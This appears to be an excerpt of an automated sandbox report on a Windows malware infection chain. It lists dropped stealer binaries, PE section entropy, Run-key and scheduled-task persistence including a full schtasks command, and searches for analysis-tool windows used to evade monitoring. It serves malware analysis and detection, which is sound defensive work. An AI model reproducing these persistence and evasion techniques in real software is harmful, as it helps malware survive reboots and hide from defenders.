Source: 2dc588f7b5.exe.13.dr Static PE information: real checksum: 0x2bfef4 should be: 0x2c40af
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: mahfbdtk
Source: file.exe Static PE information: section name: akwexcdv
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: .idata
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: mahfbdtk
Source: axplong.exe.6.dr Static PE information: section name: akwexcdv
Source: axplong.exe.6.dr Static PE information: section name: .taggant
Source: random[2].exe.13.dr Static PE information: section name:
Source: random[2].exe.13.dr Static PE information: section name: .rsrc
Source: random[2].exe.13.dr Static PE information: section name: .idata
Source: random[2].exe.13.dr Static PE information: section name:
Source: random[2].exe.13.dr Static PE information: section name: cbbjugzk
Source: random[2].exe.13.dr Static PE information: section name: lfmofsyx
Source: random[2].exe.13.dr Static PE information: section name: .taggant
Source: c8908bf20d.exe.13.dr Static PE information: section name:
Source: c8908bf20d.exe.13.dr Static PE information: section name: .rsrc
Source: c8908bf20d.exe.13.dr Static PE information: section name: .idata
Source: c8908bf20d.exe.13.dr Static PE information: section name:
Source: c8908bf20d.exe.13.dr Static PE information: section name: cbbjugzk
Source: c8908bf20d.exe.13.dr Static PE information: section name: lfmofsyx
Source: c8908bf20d.exe.13.dr Static PE information: section name: .taggant
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name: .idata
Source: random[1].exe.13.dr Static PE information: section name: wjqxmzgq
Source: random[1].exe.13.dr Static PE information: section name: xobrrexd
Source: random[1].exe.13.dr Static PE information: section name: .taggant
Source: 2dc588f7b5.exe.13.dr Static PE information: section name:
Source: 2dc588f7b5.exe.13.dr Static PE information: section name: .idata
Source: 2dc588f7b5.exe.13.dr Static PE information: section name: wjqxmzgq
Source: 2dc588f7b5.exe.13.dr Static PE information: section name: xobrrexd
Source: 2dc588f7b5.exe.13.dr Static PE information: section name: .taggant
Source: Offnewhere[1].exe.13.dr Static PE information: section name: .eh_fram
Source: Offnewhere.exe.13.dr Static PE information: section name: .eh_fram
Source: new_v8[1].exe.13.dr Static PE information: section name: .vmp+
Source: new_v8[1].exe.13.dr Static PE information: section name: .vmp+
Source: new_v8[1].exe.13.dr Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr Static PE information: section name: .vmp+
Source: random[1].exe1.13.dr Static PE information: section name:
Source: random[1].exe1.13.dr Static PE information: section name: .rsrc
Source: random[1].exe1.13.dr Static PE information: section name: .idata
Source: random[1].exe1.13.dr Static PE information: section name: wrsfsivy
Source: random[1].exe1.13.dr Static PE information: section name: bfxftgti
Source: random[1].exe1.13.dr Static PE information: section name: .taggant
Source: 550b7cfe5f.exe.13.dr Static PE information: section name:
Source: 550b7cfe5f.exe.13.dr Static PE information: section name: .rsrc
Source: 550b7cfe5f.exe.13.dr Static PE information: section name: .idata
Source: 550b7cfe5f.exe.13.dr Static PE information: section name: wrsfsivy
Source: 550b7cfe5f.exe.13.dr Static PE information: section name: bfxftgti
Source: 550b7cfe5f.exe.13.dr Static PE information: section name: .taggant
Source: GOLD1234[1].exe.13.dr Static PE information: section name: .00cfg
Source: GOLD1234[1].exe.13.dr Static PE information: section name: .call
Source: GOLD1234.exe.13.dr Static PE information: section name: .00cfg
Source: GOLD1234.exe.13.dr Static PE information: section name: .call
Source: shop[1].exe.13.dr Static PE information: section name: .00cfg
Source: shop.exe.13.dr Static PE information: section name: .00cfg
Source: freebl3.dll.17.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.17.dr Static PE information: section name: .00cfg
Source: mozglue.dll.17.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.17.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.17.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.17.dr Static PE information: section name: .didat
Source: nss3.dll.17.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.17.dr Static PE information: section name: .00cfg
Source: softokn3.dll.17.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.17.dr Static PE information: section name: .00cfg
Source: TPKOcaeSvfBbrcMznKuF.dll.18.dr Static PE information: section name: .eh_fram
Source: service123.exe.18.dr Static PE information: section name: .eh_fram
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: section name:
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: section name: .idata
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: section name: cfyesryy
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: section name: gwntuilp
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: section name: .taggant
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name:
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name: .idata
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name:
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name: edfilslq
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name: gprpjvtr
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C6D84C push ecx; ret 13_2_00C6D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00CA1694 push edi; retf 13_2_00CA1696
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0078B035 push ecx; ret 17_2_0078B048
Source: file.exe Static PE information: section name: entropy: 7.9851176619482
Source: file.exe Static PE information: section name: mahfbdtk entropy: 7.953063770644612
Source: axplong.exe.6.dr Static PE information: section name: entropy: 7.9851176619482
Source: axplong.exe.6.dr Static PE information: section name: mahfbdtk entropy: 7.953063770644612
Source: random[2].exe.13.dr Static PE information: section name: cbbjugzk entropy: 7.953118561919161
Source: c8908bf20d.exe.13.dr Static PE information: section name: cbbjugzk entropy: 7.953118561919161
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.983838861531346
Source: 2dc588f7b5.exe.13.dr Static PE information: section name: entropy: 7.983838861531346
Source: random[1].exe0.13.dr Static PE information: section name: .text entropy: 7.82060659626259
Source: f55899dae2.exe.13.dr Static PE information: section name: .text entropy: 7.82060659626259
Source: random[1].exe1.13.dr Static PE information: section name: entropy: 7.981756320370339
Source: 550b7cfe5f.exe.13.dr Static PE information: section name: entropy: 7.981756320370339
Source: GOLD1234[1].exe.13.dr Static PE information: section name: .text entropy: 7.010787961155337
Source: GOLD1234.exe.13.dr Static PE information: section name: .text entropy: 7.010787961155337
Source: shop[1].exe.13.dr Static PE information: section name: .text entropy: 7.0240622903518135
Source: shop.exe.13.dr Static PE information: section name: .text entropy: 7.0240622903518135
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: section name: entropy: 7.80234292244424
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name: entropy: 7.984163692603841
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: section name: edfilslq entropy: 7.954585037030609
Source: Application.exe.33.dr Static PE information: section name: .text entropy: 7.82060659626259

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\splwow64[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File created: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe File created: C:\ProgramData\LgAmARwZ\Application.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe File created: C:\Users\user\AppData\Local\Temp\TPKOcaeSvfBbrcMznKuF.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File created: C:\Users\user\AppData\Local\Temp\AAKAL78BRQNYOCIR09Y.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe File created: C:\ProgramData\LgAmARwZ\Application.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00789860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 17_2_00789860
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process information set: NOOPENFILEERRORBOX
